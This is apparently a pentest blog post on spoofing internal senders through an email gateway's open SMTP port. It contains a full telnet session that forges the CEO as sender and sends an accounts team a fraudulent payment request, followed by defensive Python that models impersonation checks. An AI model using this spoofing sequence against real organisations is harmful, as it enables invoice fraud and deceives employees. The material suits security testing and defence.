Bypassing Email Protection

Every now and again during a pentest we find an SMTP device deployed on a client site to provide an extra layer of email protection. A good example is the Fortigate email gateway, one of the more commonly encountered email gateway appliances.

So what can we do with it?

Well, here is the kicker. 99.999% of the email protection vendors will sell you a basic appliance, but for the protection you need to pay more. Crazy, right? You thought you were protected. Email sent from a trusted device on the target network to an internal recipient may land straight in the recipient's inbox, and if no impersonation protection is running you can send as anyone in the business.

Where do we find people in the business? LinkedIn, Facebook, Crunch; there are many sources. Of course, once you have an open SMTP connection you can also test whether a recipient's mailbox is valid without sending any email, but that is for another post later in the month.

How to test SMTP servers with telnet

This is very simple indeed. Open your favourite telnet client and connect to the SMTP port the appliance exposes. For example:

telnet fortigate.hedgehogdemo.com 25

Something similar to the following should now be displayed:

Trying 169.254.1.13...
Connected to fortigate.hedgehogdemo.com (169.251.1.13).
Escape character is '^]'.
220 fortigate.hedgehogdemo.com ESMTP Smtpd; Sat, 7 Aug 2021 03:18:07 +0100

The first command we need to issue to the mail server is EHLO (or the older HELO). This is the greeting that opens the conversation between the telnet client and the SMTP server.

EHLO alice.umbrella.corp

Something similar to the following should be returned:

250-fotigate.hedgehogdemo Hello alice.umbrella.corp [169.254.14.162], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-8BITMIME
250-SIZE 20480000
250-DSN
250-STARTTLS
250-DELIVERBY
250 HELP

The lines after the greeting list the ESMTP extensions the server advertises (each keyword optionally followed by a parameter, such as the SIZE limit). Not all SMTP servers support the same set.
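The EHLO reply is a multi-line 250 response, and a defender reviewing a gateway will usually want it pulled apart rather than eyeballed. The following is an added example, not code from the original post or from any vendor: it parses a reply constructed from the lines shown above into the greeting plus a keyword-to-parameter map, then prints a few defender-side observations (the review wording and thresholds are my own choices).

```python
# Added example (not from the original post): parse the multi-line 250
# reply that a server returns to EHLO and pull out what it advertises.
# The sample reply below is constructed from the lines shown in the post.

SAMPLE_EHLO_REPLY = (
    "250-fotigate.hedgehogdemo Hello alice.umbrella.corp [169.254.14.162], pleased to meet you\r\n"
    "250-ENHANCEDSTATUSCODES\r\n"
    "250-PIPELINING\r\n"
    "250-8BITMIME\r\n"
    "250-SIZE 20480000\r\n"
    "250-DSN\r\n"
    "250-STARTTLS\r\n"
    "250-DELIVERBY\r\n"
    "250 HELP\r\n"
)


def parse_ehlo_reply(reply):
    """Return (greeting, extensions) from an EHLO reply.

    RFC 5321 reply format: each line is a 3-digit code, then '-' if more
    lines follow or ' ' if this is the last line, then text.  The first
    250 line is the server greeting; every following line is an EHLO
    keyword, optionally followed by a parameter (e.g. 'SIZE 20480000').
    """
    greeting = None
    extensions = {}
    for index, line in enumerate(reply.splitlines()):
        if len(line) < 4 or not line[:3].isdigit() or line[3] not in "- ":
            raise ValueError(f"malformed reply line: {line!r}")
        code, last, text = line[:3], line[3] == " ", line[4:]
        if code != "250":
            raise ValueError(f"EHLO not accepted: {line!r}")
        if index == 0:
            greeting = text
        else:
            keyword, _, param = text.partition(" ")
            extensions[keyword.upper()] = param or None
        if last:
            break
    else:
        raise ValueError("reply ended without a final '250 ' line")
    return greeting, extensions


def review_extensions(extensions):
    """Defender-side notes on what the advertised keywords imply (my own wording)."""
    notes = []
    if "STARTTLS" in extensions:
        notes.append("STARTTLS offered; check that policy requires it rather than merely offering it")
    else:
        notes.append("no STARTTLS: every session on this port is plaintext")
    if "AUTH" not in extensions:
        notes.append("no AUTH offered: sender checks on this port can only rely on client address and gateway policy")
    if extensions.get("SIZE"):
        notes.append(f"largest accepted message: {int(extensions['SIZE']):,} bytes")
    return notes


if __name__ == "__main__":
    greeting, exts = parse_ehlo_reply(SAMPLE_EHLO_REPLY)
    print("greeting:", greeting)
    print("extensions:", sorted(exts))
    for note in review_extensions(exts):
        print("-", note)
```

Run it as-is and it reports the eight keywords from the sample reply; feed it a reply captured from a real session (the bytes after EHLO, CRLF line endings intact) and it will refuse anything that is not a well-formed 250 reply.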

The next command we need to issue is MAIL FROM. This sets the envelope sender, the address to which bounces are sent. It is not the same as the From header, which is the address shown in an email client.

MAIL FROM: <ceo@hedgehogdemo.com> 
250 2.1.0 MAIL ok

Now that MAIL FROM has been accepted we can send the RCPT TO command, which tells the SMTP server who the message should be delivered to. This can be the same as or different from the To header, which is the address shown in the email client.

RCPT TO: <accounts@hedgehogdemo.com>
250 2.1.5 <accounts@hedgehogdemo.com> ok

The last command before the message itself is DATA. It tells the SMTP server that everything sent next is the message content, which contains the headers as well as the body.

DATA
354 send message

You end up with a sort of interactive shell. Now to send an email to someone on the inside; a message like the example below has proved fruitful in many phishing tests.

EHLO alice.umbrella.corp
MAIL FROM: <ceo@hedgehogdemo.com>
RCPT TO: <accounts@hedgehogdemo.com>
DATA
From: "The CEO" <ceo@hedgehogdemo.com>
To: "Accounts Team" <accounts@hedgehogdemo.com>
Subject: Please pay the invoice below asap
Date: Sat, 07 Aug 2021 13:11:57 +0100

Hi
Please can you pay $7000.00 to Evil Corp on sort code 11-11-11 account number 12345678.
Thanks
The CEO

.

The final line containing only a period "." is important: it tells the SMTP service that the data stream has ended and that the message should be processed.
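The whole session above succeeds because nothing checks whether a client that is not authenticated and not an internal mail server is allowed to claim an internal sender. The block below is an added example, not code from the original post or from any gateway vendor: it models the "impersonation protection" rule the post refers to, applied to the envelope sender and the From header of the message shown above. The protected domain, the trusted network range and the policy itself are assumptions chosen for illustration.

```python
# Added example (not from the original post): a minimal model of the
# "impersonation protection" rule the post says many gateways run without.
# Everything here is an assumption for illustration: the protected domain,
# the trusted networks, and the policy itself; it is not any vendor's code.
import ipaddress
from email import message_from_string
from email.utils import parseaddr

PROTECTED_DOMAINS = {"hedgehogdemo.com"}                 # assumption: the organisation's own domains
TRUSTED_NETWORKS = [ipaddress.ip_network("10.0.0.0/8")]  # assumption: where internal MTAs live

# The message from the post, reconstructed as the text that follows DATA.
SAMPLE_MESSAGE = (
    'From: "The CEO" <ceo@hedgehogdemo.com>\r\n'
    'To: "Accounts Team" <accounts@hedgehogdemo.com>\r\n'
    "Subject: Please pay the invoice below asap\r\n"
    "Date: Sat, 07 Aug 2021 13:11:57 +0100\r\n"
    "\r\n"
    "Hi\r\n"
    "Please can you pay $7000.00 to Evil Corp on sort code 11-11-11 account number 12345678.\r\n"
    "Thanks\r\n"
    "The CEO\r\n"
)


def domain_of(address):
    """Domain part of an address (bare or 'Name <addr>'), lower-cased; '' if none."""
    _, addr = parseaddr(address)
    return addr.rpartition("@")[2].lower()


def is_trusted_client(client_ip):
    """True if the connecting IP sits inside one of the trusted networks."""
    ip = ipaddress.ip_address(client_ip)
    return any(ip in net for net in TRUSTED_NETWORKS)


def evaluate(envelope_from, raw_message, client_ip, authenticated):
    """Return (verdict, reason) the way an impersonation rule would.

    Rule: a sender claiming one of our own domains, in either the envelope
    (MAIL FROM) or the From header, must come from a trusted network or an
    authenticated session.  Anything else is treated as spoofing.
    """
    msg = message_from_string(raw_message)
    claimed = {
        "envelope": domain_of(envelope_from),
        "header": domain_of(msg.get("From", "")),
    }
    impersonating = sorted(k for k, d in claimed.items() if d in PROTECTED_DOMAINS)
    if not impersonating:
        return "ACCEPT", "no protected domain claimed"
    if authenticated or is_trusted_client(client_ip):
        return "ACCEPT", "protected domain claimed by a trusted or authenticated client"
    return "REJECT", (f"unauthenticated client {client_ip} claims a protected domain "
                      f"in {' and '.join(impersonating)}")


if __name__ == "__main__":
    # The post's scenario: the telnet client at 169.254.14.162 (from the EHLO
    # greeting), no authentication, MAIL FROM and From both claiming the CEO.
    print(evaluate("<ceo@hedgehogdemo.com>", SAMPLE_MESSAGE, "169.254.14.162", False))
    # The same message relayed by an internal MTA on the trusted range.
    print(evaluate("<ceo@hedgehogdemo.com>", SAMPLE_MESSAGE, "10.20.30.40", False))
    # Envelope is external but the From header still claims the CEO.
    print(evaluate("<bob@example.net>", SAMPLE_MESSAGE, "169.254.14.162", False))
```

The point of checking both the envelope and the header is that a gateway which only inspects MAIL FROM lets the third case through: the bounce address is external, but the mail client still displays "The CEO". A real deployment would also verify SPF, DKIM and DMARC on the claimed domain; that is outside this model.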
